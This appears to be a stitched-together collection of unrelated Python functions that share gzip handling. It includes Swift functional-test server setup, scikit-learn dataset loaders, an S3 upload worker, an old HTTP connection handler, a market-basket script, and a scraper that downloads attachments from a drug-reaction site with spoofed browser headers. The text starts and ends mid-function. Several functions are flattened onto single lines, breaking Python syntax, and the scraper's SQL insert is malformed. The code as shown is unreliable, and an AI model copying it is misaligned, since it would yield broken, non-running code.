    with open(file_path, 'rb') as source, \
            GzipFile(target_path, 'wb') as sink:
        shutil.copyfileobj(source, sink)
    return target_path
def S3CompressedReader(bucket, path):
    """Return a ``GzipFile`` reader over an S3 object's content.

    The object at ``bucket``/``path`` is fetched through ``boto3``, its body
    is read fully into memory, and a ``GzipFile`` opened in ``"rb"`` mode on
    that in-memory copy is returned.
    """
    response = boto3.resource('s3').Object(bucket, path).get()
    payload = response['Body'].read()
    return GzipFile(fileobj=StringIO(payload), mode="rb")
def downallfiles3(id, psurobjid, filename, reportid): # url = "http://www.adrs.org.cn/ADR/cdrAttachment/attachmentDiskManager/" #id = "109913972074597010463482100000" #psurobjid = "243013972078880790070655100000" import random some = random.randrange(1000000000000000, 9999999999999999) boundary = '-----------------------------' + str(some) parts = [] parts.append('--' + boundary) parts.append('Content-Disposition: form-data; name="action"') parts.append('') parts.append(str("download")) parts.append('--' + boundary) parts.append('Content-Disposition: form-data; name="id"') parts.append('') parts.append(id) parts.append('--' + boundary + '--') parts.append('') body = '\r\n'.join(parts) header = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Host': 'Host: www.adrs.org.cn', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Content-Type': 'multipart/form-data; boundary=%(boundary)s' % { "boundary": boundary }, 'Referer': 'http://www.adrs.org.cn/ADR/page/adrpage/psur/viewPsurReport.jsp?fdObjectId=%(objid)s&type=2' % { "objid": psurobjid } } try: common_url = urllib2.Request(url, headers=header) response = urllib2.urlopen(common_url, data=body, timeout=120) #print "response.info():",response.info() from cStringIO import StringIO from gzip import GzipFile data2 = GzipFile('', 'r', 0, StringIO(response.read())).read() response_data = data2 # 定义要创建的目录 import pathDlg mkpath = "c:\\mykill\\web\\" #mkpath = pathDlg.readini_path() path = mkdir(mkpath, psurobjid) name = path + "\\" + filename print name local_file = open(name, "wb") local_file.write(response_data) local_file.close() except (urllib2.HTTPError, urllib2.URLError, socket.error), exception: print u"下载出现错误,打印文件信息:", id, psurobjid, filename, reportid tempdata = (reportid, psurobjid, filename, id) insert_sql = ( "insert into 
pusr_dwfinfo_down_error(ReportID, FileID,ShowFileName BackUp1) " "value(%s,%s,%s,%s,%s)") mdrsql.mdr_insert_alone(insert_sql, tempdata) pass
def in_process_setup(the_object_server=object_server):
    """Start a complete set of Swift servers inside the test process.

    Locates the proxy and swift config files, creates a temporary device
    tree, points the utils and storage policy modules at the prepared
    swift.conf, writes account and container rings, and spawns proxy,
    account, container and object WSGI servers with ``eventlet.spawn``.
    Finally the ``AUTH_test`` and ``AUTH_test2`` accounts are created.

    Module globals written: ``_testdir``, ``orig_swift_conf_name``,
    ``config``, ``orig_hash_path_suff_pref`` and ``_test_coros``. Several
    ``eventlet.wsgi`` module and class attributes are also overridden.

    :param the_object_server: module whose ``ObjectController`` class is
        instantiated for each object server socket.
    :raises InProcessException: if the config source dir is not a directory
        or the proxy app cannot be loaded.
    :raises SkipTest: if the swift constraints were not loaded.
    """
    _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS')
    _info('Using object_server class: %s' % the_object_server.__name__)
    conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR')

    if conf_src_dir is not None:
        if not os.path.isdir(conf_src_dir):
            msg = 'Config source %s is not a dir' % conf_src_dir
            raise InProcessException(msg)
        _info('Using config source dir: %s' % conf_src_dir)

    # If SWIFT_TEST_IN_PROCESS_CONF specifies a config source dir then
    # prefer config files from there, otherwise read config from source tree
    # sample files. A mixture of files from the two sources is allowed.
    proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf')
    _info('Using proxy config from %s' % proxy_conf)
    swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf')
    _info('Using swift config from %s' % swift_conf_src)

    monkey_patch_mimetools()

    # Build the temporary device tree. The directory is created and removed
    # once before the per-device directories are made, so the tree starts
    # out empty.
    global _testdir
    _testdir = os.path.join(mkdtemp(), 'tmp_functional')
    utils.mkdirs(_testdir)
    rmtree(_testdir)
    utils.mkdirs(os.path.join(_testdir, 'sda1'))
    utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp'))

    swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir)
    obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir)

    # Remember the original swift.conf location, then point both the utils
    # and storage_policy modules at the prepared copy and reload from it.
    global orig_swift_conf_name
    orig_swift_conf_name = utils.SWIFT_CONF_FILE
    utils.SWIFT_CONF_FILE = swift_conf
    constraints.reload_constraints()
    storage_policy.SWIFT_CONF_FILE = swift_conf
    storage_policy.reload_storage_policies()
    global config
    if constraints.SWIFT_CONSTRAINTS_LOADED:
        # Use the swift constraints that are loaded for the test framework
        # configuration
        _c = dict(
            (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items())
        config.update(_c)
    else:
        # In-process swift constraints were not loaded, somethings wrong
        raise SkipTest

    # Keep the current hash path prefix/suffix in a module global before
    # re-validating the hash configuration.
    global orig_hash_path_suff_pref
    orig_hash_path_suff_pref = utils.HASH_PATH_PREFIX, utils.HASH_PATH_SUFFIX
    utils.validate_hash_conf()

    # We create the proxy server listening socket to get its port number so
    # that we can add it as the "auth_port" value for the functional test
    # clients.
    prolis = eventlet.listen(('localhost', 0))

    # The following set of configuration values is used both for the
    # functional test frame work and for the various proxy, account, container
    # and object servers.
    config.update({
        # Values needed by the various in-process swift servers
        'devices': _testdir,
        'swift_dir': _testdir,
        'mount_check': 'false',
        'client_timeout': '4',
        'allow_account_management': 'true',
        'account_autocreate': 'true',
        'allow_versions': 'True',
        # Below are values used by the functional test framework, as well as
        # by the various in-process swift servers
        'auth_host': '127.0.0.1',
        'auth_port': str(prolis.getsockname()[1]),
        'auth_ssl': 'no',
        'auth_prefix': '/auth/',
        # Primary functional test account (needs admin access to the
        # account)
        'account': 'test',
        'username': '******',
        'password': '******',
        # User on a second account (needs admin access to the account)
        'account2': 'test2',
        'username2': 'tester2',
        'password2': 'testing2',
        # User on same account as first, but without admin access
        'username3': 'tester3',
        'password3': 'testing3',
        # Service user and prefix (emulates glance, cinder, etc. user)
        'account5': 'test5',
        'username5': 'tester5',
        'password5': 'testing5',
        'service_prefix': 'SERVICE',
        # For tempauth middleware. Update reseller_prefix
        'reseller_prefix': 'AUTH, SERVICE',
        'SERVICE_require_group': 'service'
    })

    # Listening sockets for two account and two container servers; their
    # port numbers are written into the rings below.
    acc1lis = eventlet.listen(('localhost', 0))
    acc2lis = eventlet.listen(('localhost', 0))
    con1lis = eventlet.listen(('localhost', 0))
    con2lis = eventlet.listen(('localhost', 0))

    # Account ring: two devices (sda1, sdb1) pickled into a gzip file.
    account_ring_path = os.path.join(_testdir, 'account.ring.gz')
    with closing(GzipFile(account_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{
                'id': 0,
                'zone': 0,
                'device': 'sda1',
                'ip': '127.0.0.1',
                'port': acc1lis.getsockname()[1]
            }, {
                'id': 1,
                'zone': 1,
                'device': 'sdb1',
                'ip': '127.0.0.1',
                'port': acc2lis.getsockname()[1]
            }], 30), f)

    # Container ring: same layout, pointing at the container sockets.
    container_ring_path = os.path.join(_testdir, 'container.ring.gz')
    with closing(GzipFile(container_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{
                'id': 0,
                'zone': 0,
                'device': 'sda1',
                'ip': '127.0.0.1',
                'port': con1lis.getsockname()[1]
            }, {
                'id': 1,
                'zone': 1,
                'device': 'sdb1',
                'ip': '127.0.0.1',
                'port': con2lis.getsockname()[1]
            }], 30), f)

    eventlet.wsgi.HttpProtocol.default_request_version = "HTTP/1.0"
    # Turn off logging requests by the underlying WSGI software.
    eventlet.wsgi.HttpProtocol.log_request = lambda *a: None
    logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi')
    # Redirect logging other messages by the underlying WSGI software.
    # The lambda looks ``logger`` up when it is called, so once ``logger`` is
    # rebound further down it logs through the 'proxy' debug logger.
    eventlet.wsgi.HttpProtocol.log_message = \
        lambda s, f, *a: logger.error('ERROR WSGI: ' + f % a)
    # Default to only 4 seconds for in-process functional test runs
    eventlet.wsgi.WRITE_TIMEOUT = 4

    acc1srv = account_server.AccountController(config,
                                               logger=debug_logger('acct1'))
    acc2srv = account_server.AccountController(config,
                                               logger=debug_logger('acct2'))
    con1srv = container_server.ContainerController(
        config, logger=debug_logger('cont1'))
    con2srv = container_server.ContainerController(
        config, logger=debug_logger('cont2'))

    # One (socket, controller) pair per object server socket.
    objsrvs = [(obj_sockets[index],
                the_object_server.ObjectController(config,
                                                   logger=debug_logger(
                                                       'obj%d' % (index + 1))))
               for index in range(len(obj_sockets))]

    logger = debug_logger('proxy')

    def get_logger(name, *args, **kwargs):
        # Stand-in for swift.common.utils.get_logger while the proxy app is
        # loaded: every caller receives the 'proxy' debug logger.
        return logger

    with mock.patch('swift.common.utils.get_logger', get_logger):
        with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware',
                        FakeMemcacheMiddleware):
            try:
                app = loadapp(proxy_conf, global_conf=config)
            except Exception as e:
                raise InProcessException(e)

    nl = utils.NullLogger()
    prospa = eventlet.spawn(eventlet.wsgi.server, prolis, app, nl)
    acc1spa = eventlet.spawn(eventlet.wsgi.server, acc1lis, acc1srv, nl)
    acc2spa = eventlet.spawn(eventlet.wsgi.server, acc2lis, acc2srv, nl)
    con1spa = eventlet.spawn(eventlet.wsgi.server, con1lis, con1srv, nl)
    con2spa = eventlet.spawn(eventlet.wsgi.server, con2lis, con2srv, nl)

    objspa = [
        eventlet.spawn(eventlet.wsgi.server, objsrv[0], objsrv[1], nl)
        for objsrv in objsrvs
    ]

    global _test_coros
    _test_coros = \
        (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa)

    # Create accounts "test" and "test2"
    def create_account(act):
        # PUT the account on every node the account ring returns for it and
        # require a 201 from each.
        ts = utils.normalize_timestamp(time())
        account_ring = Ring(_testdir, ring_name='account')
        partition, nodes = account_ring.get_nodes(act)
        for node in nodes:
            # Note: we are just using the http_connect method in the object
            # controller here to talk to the account server nodes.
            conn = swift.proxy.controllers.obj.http_connect(
                node['ip'], node['port'], node['device'], partition, 'PUT',
                '/' + act, {
                    'X-Timestamp': ts,
                    'x-trans-id': act
                })
            resp = conn.getresponse()
            assert (resp.status == 201)

    create_account('AUTH_test')
    create_account('AUTH_test2')
def fetch_covtype(data_home=None, download_if_missing=True,
                  random_state=None, shuffle=False, return_X_y=False):
    """Load the covertype dataset (classification).

    Download it if necessary.

    =================   ============
    Classes                        7
    Samples total             581012
    Dimensionality                54
    Features                     int
    =================   ============

    Read more in the :ref:`User Guide <covtype_dataset>`.

    Parameters
    ----------
    data_home : string, optional
        Specify another download and cache folder for the datasets. By default
        all scikit-learn data is stored in '~/scikit_learn_data' subfolders.

    download_if_missing : boolean, default=True
        If False, raise an IOError if the data is not locally available
        instead of trying to download the data from the source site.

    random_state : int, RandomState instance or None (default)
        Determines random number generation for dataset shuffling. Pass an int
        for reproducible output across multiple function calls.
        See :term:`Glossary <random_state>`.

    shuffle : bool, default=False
        Whether to shuffle dataset.

    return_X_y : boolean, default=False.
        If True, returns ``(data.data, data.target)`` instead of a Bunch
        object.

        .. versionadded:: 0.20

    Returns
    -------
    dataset : dict-like object with the following attributes:

    dataset.data : numpy array of shape (581012, 54)
        Each row corresponds to the 54 features in the dataset.

    dataset.target : numpy array of shape (581012,)
        Each value corresponds to one of the 7 forest covertypes with values
        ranging between 1 to 7.

    dataset.DESCR : string
        Description of the forest covertype dataset.

    (data, target) : tuple if ``return_X_y`` is True

        .. versionadded:: 0.20

    Raises
    ------
    IOError
        If the cached samples are missing and ``download_if_missing`` is
        False.
    """
    data_home = get_data_home(data_home=data_home)
    covtype_dir = join(data_home, "covertype")
    samples_path = _pkl_filepath(covtype_dir, "samples")
    targets_path = _pkl_filepath(covtype_dir, "targets")
    available = exists(samples_path)

    if available:
        X, y = _refresh_cache([samples_path, targets_path], 9)
        # TODO: Revert to the following two lines in v0.23
        # X = joblib.load(samples_path)
        # y = joblib.load(targets_path)
    elif not download_if_missing:
        raise IOError("Data not found and `download_if_missing` is False")
    else:
        if not exists(covtype_dir):
            makedirs(covtype_dir)
        logger.info("Downloading %s" % ARCHIVE.url)

        archive_path = _fetch_remote(ARCHIVE, dirname=covtype_dir)
        # Close the archive before deleting it: an open handle keeps the
        # descriptor alive and makes the removal fail on some platforms.
        with GzipFile(filename=archive_path) as archive:
            Xy = np.genfromtxt(archive, delimiter=',')
        # delete archive
        remove(archive_path)

        # The last column holds the class label, the rest are features.
        X = Xy[:, :-1]
        y = Xy[:, -1].astype(np.int32, copy=False)

        joblib.dump(X, samples_path, compress=9)
        joblib.dump(y, targets_path, compress=9)

    if shuffle:
        ind = np.arange(X.shape[0])
        rng = check_random_state(random_state)
        rng.shuffle(ind)
        X = X[ind]
        y = y[ind]

    module_path = dirname(__file__)
    with open(join(module_path, 'descr', 'covtype.rst')) as rst_file:
        fdescr = rst_file.read()

    if return_X_y:
        return X, y

    return Bunch(data=X, target=y, DESCR=fdescr)
def compress_string(s):
    """Return the bytes ``s`` gzip-compressed (compression level 6)."""
    sink = BytesIO()
    writer = GzipFile(fileobj=sink, mode='wb', compresslevel=6)
    try:
        writer.write(s)
    finally:
        # Closing flushes the gzip trailer into the in-memory sink.
        writer.close()
    return sink.getvalue()
def fetch_rcv1(data_home=None, subset='all', download_if_missing=True,
               random_state=None, shuffle=False):
    """Load the RCV1 multilabel dataset, downloading it if necessary.

    Version: RCV1-v2, vectors, full sets, topics multilabels.

    ==============     =====================
    Classes                              103
    Samples total                     804414
    Dimensionality                     47236
    Features           real, between 0 and 1
    ==============     =====================

    Read more in the :ref:`User Guide <datasets>`.

    Parameters
    ----------
    data_home : string, optional
        Specify another download and cache folder for the datasets. By default
        all scikit learn data is stored in '~/scikit_learn_data' subfolders.

    subset: string, 'train', 'test', or 'all', default='all'
        Select the dataset to load: 'train' for the training set
        (23149 samples), 'test' for the test set (781265 samples),
        'all' for both, with the training samples first if shuffle is False.
        This follows the official LYRL2004 chronological split.

    download_if_missing : boolean, default=True
        If False, raise a IOError if the data is not locally available
        instead of trying to download the data from the source site.

    random_state : int, RandomState instance or None, optional (default=None)
        Random state for shuffling the dataset.
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.

    shuffle : bool, default=False
        Whether to shuffle dataset.

    Returns
    -------
    dataset : dict-like object with the following attributes:

    dataset.data : scipy csr array, dtype np.float64, shape (804414, 47236)
        The array has 0.16% of non zero values.

    dataset.target : scipy csr array, dtype np.uint8, shape (804414, 103)
        Each sample has a value of 1 in its categories, and 0 in others.
        The array has 3.15% of non zero values.

    dataset.sample_id : numpy array, dtype np.uint32, shape (804414,)
        Identification number of each sample, as ordered in dataset.data.

    dataset.target_names : numpy array, dtype object, length (103)
        Names of each target (RCV1 topics), as ordered in dataset.target.

    dataset.DESCR : string
        Description of the RCV1 dataset.

    Raises
    ------
    ValueError
        If ``subset`` is not one of 'all', 'train' or 'test'.

    Reference
    ---------
    Lewis, D. D., Yang, Y., Rose, T. G., & Li, F. (2004). RCV1: A new
    benchmark collection for text categorization research. The Journal of
    Machine Learning Research, 5, 361-397.

    """
    N_SAMPLES = 804414
    N_FEATURES = 47236
    N_CATEGORIES = 103
    N_TRAIN = 23149

    data_home = get_data_home(data_home=data_home)
    rcv1_dir = join(data_home, "RCV1")
    if download_if_missing:
        makedirs(rcv1_dir, exist_ok=True)

    samples_path = join(rcv1_dir, "samples.pkl")
    sample_id_path = join(rcv1_dir, "sample_id.pkl")
    sample_topics_path = join(rcv1_dir, "sample_topics.pkl")
    topics_path = join(rcv1_dir, "topics_names.pkl")

    # load data (X) and sample_id
    if download_if_missing and (not exists(samples_path) or
                                not exists(sample_id_path)):
        file_urls = ["%s_test_pt%d.dat.gz" % (URL, i) for i in range(4)]
        file_urls.append("%s_train.dat.gz" % URL)
        files = []
        try:
            for file_url in file_urls:
                logger.warning("Downloading %s" % file_url)
                with closing(urlopen(file_url)) as online_file:
                    # buffer the full file in memory to make possible to Gzip
                    # to work correctly
                    f = BytesIO(online_file.read())
                files.append(GzipFile(fileobj=f))

            Xy = load_svmlight_files(files, n_features=N_FEATURES)
        finally:
            # Release the gzip readers whether or not parsing succeeded.
            for gz_file in files:
                gz_file.close()

        # load_svmlight_files returns [X0, y0, X1, y1, ...] in input order;
        # the train file is last (index 8/9) but must come first.
        # Training data is before testing data
        X = sp.vstack([Xy[8], Xy[0], Xy[2], Xy[4], Xy[6]]).tocsr()
        sample_id = np.hstack((Xy[9], Xy[1], Xy[3], Xy[5], Xy[7]))
        sample_id = sample_id.astype(np.uint32)

        joblib.dump(X, samples_path, compress=9)
        joblib.dump(sample_id, sample_id_path, compress=9)

    else:
        X = joblib.load(samples_path)
        sample_id = joblib.load(sample_id_path)

    # load target (y), categories, and sample_id_bis
    if download_if_missing and (not exists(sample_topics_path) or
                                not exists(topics_path)):
        logger.warning("Downloading %s" % URL_topics)
        with closing(urlopen(URL_topics)) as online_topics:
            f = BytesIO(online_topics.read())

        # parse the target file
        n_cat = -1
        n_doc = -1
        doc_previous = -1
        y = np.zeros((N_SAMPLES, N_CATEGORIES), dtype=np.uint8)
        sample_id_bis = np.zeros(N_SAMPLES, dtype=np.int32)
        category_names = {}
        with GzipFile(fileobj=f, mode='rb') as topics_file:
            for line in topics_file:
                line_components = line.decode("ascii").split(u" ")
                if len(line_components) == 3:
                    cat, doc, _ = line_components
                    if cat not in category_names:
                        n_cat += 1
                        category_names[cat] = n_cat

                    doc = int(doc)
                    # A new document id starts a new row of y.
                    if doc != doc_previous:
                        doc_previous = doc
                        n_doc += 1
                        sample_id_bis[n_doc] = doc
                    y[n_doc, category_names[cat]] = 1

        # Samples in X are ordered with sample_id,
        # whereas in y, they are ordered with sample_id_bis.
        permutation = _find_permutation(sample_id_bis, sample_id)
        y = y[permutation, :]

        # save category names in a list, with same order than y
        categories = np.empty(N_CATEGORIES, dtype=object)
        for name, index in category_names.items():
            categories[index] = name

        # reorder categories in lexicographic order
        order = np.argsort(categories)
        categories = categories[order]
        y = sp.csr_matrix(y[:, order])

        joblib.dump(y, sample_topics_path, compress=9)
        joblib.dump(categories, topics_path, compress=9)

    else:
        y = joblib.load(sample_topics_path)
        categories = joblib.load(topics_path)

    if subset == 'all':
        pass
    elif subset == 'train':
        X = X[:N_TRAIN, :]
        y = y[:N_TRAIN, :]
        sample_id = sample_id[:N_TRAIN]
    elif subset == 'test':
        X = X[N_TRAIN:, :]
        y = y[N_TRAIN:, :]
        sample_id = sample_id[N_TRAIN:]
    else:
        raise ValueError("Unknown subset parameter. Got '%s' instead of one"
                         " of ('all', 'train', 'test')" % subset)

    if shuffle:
        X, y, sample_id = shuffle_(X, y, sample_id, random_state=random_state)

    return Bunch(data=X, target=y, sample_id=sample_id,
                 target_names=categories, DESCR=__doc__)
def putter(put, put_queue, stat_queue, options):
    """Worker loop: take upload jobs from ``put_queue`` and store them in S3.

    Each queue item is either ``None`` (stop this worker) or a
    ``(key_name, value_kwargs)`` pair. For every pair, ``put`` is called with
    the bucket, the key name and a ``Value`` built from ``value_kwargs``;
    when it returns a key and the value reports that its content should be
    copied, the content is (optionally gzipped and) written to that key.
    The size of each handled value is reported on ``stat_queue``.

    :param put: callable ``put(bucket, key_name, value)`` returning a key
        object, or a falsy value when the item should be skipped.
    :param put_queue: joinable queue of jobs; ``task_done()`` is called once
        for every item taken from it.
    :param stat_queue: queue receiving ``dict(size=...)`` per stored value.
    :param options: parsed options; the attributes read here are
        ``gzip_type``, ``gzip``, ``secure``, ``host``, ``bucket``,
        ``headers``, ``content_type``, ``dry_run``, ``grant`` and
        ``encrypt_key``.
    """
    logger = logging.getLogger(
        '%s[putter-%d]' % (os.path.basename(sys.argv[0]),
                           current_process().pid))
    # Connection and bucket are created lazily and reused across jobs.
    connection, bucket = None, None
    file_object_cache = FileObjectCache()
    # Figure out what content types we want to gzip
    if not options.gzip_type:  # default
        gzip_content_types = GZIP_CONTENT_TYPES
    elif 'all' in options.gzip_type:
        gzip_content_types = GZIP_ALL
    else:
        gzip_content_types = options.gzip_type
    if 'guess' in gzip_content_types:
        # don't bother removing 'guess' from the list since nothing will match it
        # NOTE(review): extend() mutates the list in place, i.e. the object
        # that options.gzip_type refers to -- confirm that is intended.
        gzip_content_types.extend(GZIP_CONTENT_TYPES)
    if options.gzip:
        logger.debug('These content types will be gzipped: %s' %
                     unicode(gzip_content_types))
    while True:
        args = put_queue.get()
        if args is None:
            # Sentinel: acknowledge it and stop this worker.
            put_queue.task_done()
            break
        key_name, value_kwargs = args
        value = Value(file_object_cache, **value_kwargs)
        should_gzip = False
        try:
            if connection is None:
                connection = S3Connection(is_secure=options.secure,
                                          host=options.host)
            if bucket is None:
                bucket = connection.get_bucket(options.bucket)
            key = put(bucket, key_name, value)
            if key:
                if value.should_copy_content():
                    # Extra headers are given as "Name:value" strings.
                    if options.headers:
                        headers = dict(
                            tuple(header.split(':', 1))
                            for header in options.headers)
                    else:
                        headers = {}

                    content_type = None
                    if options.content_type:
                        if options.content_type == 'guess':
                            content_type = mimetypes.guess_type(value.path)[0]
                        elif options.content_type == 'magic':
                            # Try the filename first, then fall back to
                            # inspecting the file with magic.
                            content_type = mimetypes.guess_type(value.path)[0]
                            if content_type is None:
                                content_type = magic.from_file(value.path,
                                                               mime=True)
                        else:
                            content_type = options.content_type
                        headers['Content-Type'] = content_type

                    content = value.get_content()
                    md5 = value.md5
                    should_gzip = options.gzip and (
                        content_type and content_type in gzip_content_types or
                        gzip_content_types == GZIP_ALL)
                    if should_gzip:
                        headers['Content-Encoding'] = 'gzip'
                        string_io = StringIO()
                        gzip_file = GzipFile(compresslevel=9,
                                             fileobj=string_io, mode='w')
                        gzip_file.write(content)
                        gzip_file.close()
                        content = string_io.getvalue()
                        # The checksum must describe the bytes actually sent,
                        # so recompute it over the compressed content.
                        md5 = compute_md5(StringIO(content))
                    if not options.dry_run:
                        key.set_contents_from_string(
                            content, headers, md5=md5, policy=options.grant,
                            encrypt_key=options.encrypt_key)
                logger.info(
                    '%s %s> %s' % (value.path, 'z' if should_gzip else '-',
                                   key.name))
                stat_queue.put(dict(size=value.get_size()))
            else:
                logger.info('skipping %s -> %s' % (value.path, key_name))
        except SSLError as exc:
            logger.error('%s -> %s (%s)' % (value.path, key_name, exc))
            # Re-queue the job and drop the connection so the next iteration
            # reconnects from scratch.
            put_queue.put(args)
            connection, bucket = None, None
        except IOError as exc:
            # Logged only; the job is not retried.
            logger.error('%s -> %s (%s)' % (value.path, key_name, exc))
        put_queue.task_done()
class HTTPSConnection(Dispatcher): def __init__(self, socket, getfunc): Dispatcher.__init__(self, socket) self.req = '' self.set_terminator('\n') self.getfunc = getfunc self.next_func = self.read_type ## HTTP handling methods ## def read_type(self, data): self.header = data.strip() words = data.split() if len(words) == 3: self.command, self.path, garbage = words self.pre1 = False elif len(words) == 2: self.command, self.path = words self.pre1 = True if self.command != 'GET': return None else: return None if self.command not in ('HEAD', 'GET'): return None self.headers = {} return self.read_header def read_header(self, data): data = data.strip() if data == '': # check for Accept-Encoding: header, pick a if self.headers.has_key('accept-encoding'): ae = self.headers['accept-encoding'] log.debug("Got Accept-Encoding: " + ae + "\n") else: #identity assumed if no header ae = 'identity' # this eventually needs to support multple acceptable types # q-values and all that fancy HTTP crap # for now assume we're only communicating with our own client if ae.find('gzip') != -1: self.encoding = 'gzip' else: #default to identity. 
self.encoding = 'identity' r = self.getfunc(self, self.path, self.headers) if r is not None: self.answer(r) return None try: i = data.index(':') except ValueError: return None self.headers[data[:i].strip().lower()] = data[i+1:].strip() log.debug(data[:i].strip() + ": " + data[i+1:].strip()) return self.read_header def answer(self, (responsecode, responsestring, headers, data)): if self.encoding == 'gzip': #transform data using gzip compression #this is nasty but i'm unsure of a better way at the moment compressed = StringIO() gz = GzipFile(fileobj = compressed, mode = 'wb', compresslevel = 9) gz.write(data) gz.close() compressed.seek(0,0) cdata = compressed.read() compressed.close() if len(cdata) >= len(data): self.encoding = 'identity' else: log.debug("Compressed: %i Uncompressed: %i\n" % (len(cdata),len(data))) data = cdata headers['Content-Encoding'] = 'gzip' # i'm abusing the identd field here, but this should be ok if self.encoding == 'identity': ident = '-' else: ident = self.encoding username = '******' referer = self.headers.get('referer','-') useragent = self.headers.get('user-agent','-') timestamp = strftime("%d/%b/%Y:%H:%I:%S") log.info('%s %s %s [%s] "%s" %i %i "%s" "%s"' % ( self.socket.addr[0], ident, username, timestamp, self.header, responsecode, len(data), referer, useragent)) r = StringIO() r.write('HTTP/1.0 ' + str(responsecode) + ' ' + responsestring + '\r\n') if not self.pre1: headers['Content-Length'] = len(data) for key, value in headers.items(): r.write(key + ': ' + str(value) + '\r\n') r.write('\r\n') if self.command != 'HEAD': r.write(data) self.push(r.getvalue()) self.close_when_done()
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 31 11:45:12 2017

@author: jabong
"""

import numpy as np
from collections import defaultdict
from itertools import chain
from gzip import GzipFile

# Minimum number of transactions an item must appear in to be kept.
minsupport = 80

# Each line of the data file is one transaction: whitespace-separated
# integer item ids. Read it inside a ``with`` so the handle is closed.
with GzipFile('data/retail.dat.gz') as retail_file:
    dataset = [[int(tok) for tok in line.strip().split()]
               for line in retail_file]

# Count how often each item occurs over all transactions.
counts = defaultdict(int)
for elem in chain.from_iterable(dataset):
    counts[elem] += 1

# Keep only items that meet the support threshold, then drop the others
# from every transaction.
valid = set(el for el, c in counts.items() if (c >= minsupport))

dataset = [[el for el in ds if (el in valid)] for ds in dataset]
dataset = [frozenset(ds) for ds in dataset]

# Start from single-item sets.
itemsets = [frozenset([v]) for v in valid]
freqsets = itemsets[:]
for i in range(16):
    print("At iteration {}, number of frequent buskets: {}".format(i, len(itemsets)))
    nextsets = []
    tested = set()
def _in_process_setup_ring(swift_conf, conf_src_dir, testdir):
    """
    Prepare the object ring (and storage policy config) for in-process tests.

    If SWIFT_TEST_POLICY is set:
    - look in swift.conf file for specified policy
    - move this to be policy-0 but preserving its options
    - copy its ring file to test dir, changing its devices to suit
      in process testing, and renaming it to suit policy-0
    Otherwise, create a default ring file.

    Returns the list of listening sockets, one per object ring device.
    Raises InProcessException when the policies cannot be parsed, the
    specified policy is unknown, or its ring file cannot be found.
    """
    sp_prefix = 'storage-policy:'
    conf = ConfigParser()
    conf.read(swift_conf)

    try:
        # policy index 0 will be created if no policy exists in conf
        policies = parse_storage_policies(conf)
    except PolicyError as e:
        raise InProcessException(e)

    # clear all policies from test swift.conf before adding test policy back
    for existing in policies:
        conf.remove_section(sp_prefix + str(existing.idx))

    if not policy_specified:
        policy_to_test = policies.default
        _info('Defaulting to policy %s' % policy_to_test.name)
    else:
        policy_to_test = policies.get_by_name(policy_specified)
        if policy_to_test is None:
            raise InProcessException('Failed to find policy name "%s"'
                                     % policy_specified)
        _info('Using specified policy %s' % policy_to_test.name)

    # make policy_to_test be policy index 0 and default for the test config
    sp_zero_section = sp_prefix + '0'
    conf.add_section(sp_zero_section)
    policy_info = policy_to_test.get_info(config=True)
    for option, value in policy_info.items():
        conf.set(sp_zero_section, option, value)
    conf.set(sp_zero_section, 'default', True)

    with open(swift_conf, 'w') as fp:
        conf.write(fp)

    # look for a source ring file
    ring_file_test = 'object.ring.gz'
    if policy_to_test.idx:
        src_name = 'object-%s.ring.gz' % policy_to_test.idx
    else:
        src_name = 'object.ring.gz'
    try:
        ring_file_src = _in_process_find_conf_file(conf_src_dir, src_name,
                                                   use_sample=False)
    except InProcessException:
        # A missing ring is only fatal when a policy was explicitly requested.
        if policy_specified:
            raise InProcessException('Failed to find ring file %s'
                                     % src_name)
        ring_file_src = None

    ring_file_test = os.path.join(testdir, ring_file_test)
    if ring_file_src:
        # copy source ring file to a policy-0 test ring file, re-homing servers
        _info('Using source ring file %s' % ring_file_src)
        ring_data = ring.RingData.load(ring_file_src)
        obj_sockets = []
        for index, dev in enumerate(ring_data.devs):
            # index equals the number of sockets opened so far, giving
            # device names sda1, sdb1, ...
            device = 'sd%c1' % chr(index + ord('a'))
            # NOTE(review): the directories are always created under 'sda1'
            # regardless of ``device``, and under the module-level _testdir
            # rather than the ``testdir`` argument -- confirm intent.
            utils.mkdirs(os.path.join(_testdir, 'sda1'))
            utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
            obj_socket = listen_zero()
            obj_sockets.append(obj_socket)
            dev['port'] = obj_socket.getsockname()[1]
            dev['ip'] = '127.0.0.1'
            dev['device'] = device
            dev['replication_port'] = dev['port']
            dev['replication_ip'] = dev['ip']
        ring_data.save(ring_file_test)
    else:
        # make default test ring, 3 replicas, 4 partitions, 3 devices
        # which will work for a replication policy or a 2+1 EC policy
        _info('No source object ring file, creating 3rep/4part/3dev ring')
        device_names = ('sda1', 'sdb1', 'sdc1')
        obj_sockets = [listen_zero() for _ in range(3)]
        replica2part2dev_id = [[0, 1, 2, 0],
                               [1, 2, 0, 1],
                               [2, 0, 1, 2]]
        devs = []
        for index, (name, sock) in enumerate(zip(device_names, obj_sockets)):
            devs.append({'id': index, 'zone': index, 'device': name,
                         'ip': '127.0.0.1',
